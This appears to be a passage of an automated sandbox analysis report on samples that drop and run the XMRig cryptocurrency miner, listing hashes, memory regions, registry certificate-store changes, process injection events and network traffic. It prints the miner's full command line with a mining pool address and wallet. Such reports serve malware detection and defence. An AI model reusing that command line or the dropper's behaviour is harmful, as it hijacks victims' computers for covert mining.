| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5080-16-0x0000018AB2ED0000-0x0000018AB2EF0000-memory.dmp
memory/5080-17-0x0000018AB2F20000-0x0000018AB2F40000-memory.dmp
memory/5080-18-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-20-0x0000018AB2F70000-0x0000018AB2F90000-memory.dmp
memory/5080-19-0x0000018AB2F50000-0x0000018AB2F70000-memory.dmp
memory/5080-21-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-22-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-23-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-25-0x0000018AB2F70000-0x0000018AB2F90000-memory.dmp
memory/5080-24-0x0000018AB2F50000-0x0000018AB2F70000-memory.dmp
memory/5080-26-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-27-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-28-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-29-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-30-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-31-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-32-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-33-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-34-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-35-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-36-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-37-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-38-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-39-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-40-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-41-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-42-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-43-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-44-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-45-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-46-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-47-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-48-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-49-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-50-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-51-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-52-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-53-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-54-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-55-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-56-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-57-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-58-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-59-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-60-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-61-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-62-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-63-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-64-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-65-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-66-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-67-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-68-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-69-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-70-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-71-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-72-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-73-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-74-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-75-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-76-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-77-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-78-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-79-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-80-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-81-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-82-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-83-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-84-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3288 wrote to memory of 1616 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3288 wrote to memory of 1616 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1616-16-0x0000019DD59B0000-0x0000019DD59D0000-memory.dmp
memory/1616-17-0x0000019DD5C10000-0x0000019DD5C30000-memory.dmp
memory/1616-18-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-19-0x0000019DD5C30000-0x0000019DD5C50000-memory.dmp
memory/1616-20-0x0000019DD7500000-0x0000019DD7520000-memory.dmp
memory/1616-21-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-22-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-25-0x0000019DD7500000-0x0000019DD7520000-memory.dmp
memory/1616-24-0x0000019DD5C30000-0x0000019DD5C50000-memory.dmp
memory/1616-23-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-26-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-27-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-28-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-29-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-30-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-31-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-32-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-33-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-34-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-35-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-36-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-37-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-38-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-39-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-40-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-41-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-42-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-43-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-44-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-45-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-46-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-47-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-48-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-49-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-50-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-51-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-52-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-53-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-54-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-55-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-56-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-57-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-58-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-59-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-60-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-61-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-62-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-63-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-64-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-65-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-66-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-67-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-68-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-69-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-70-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-71-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-72-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-73-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-74-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-75-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-76-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-77-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-78-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-79-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-80-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-81-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-82-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-83-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-84-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:15
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2424 wrote to memory of 3312 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2424 wrote to memory of 3312 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
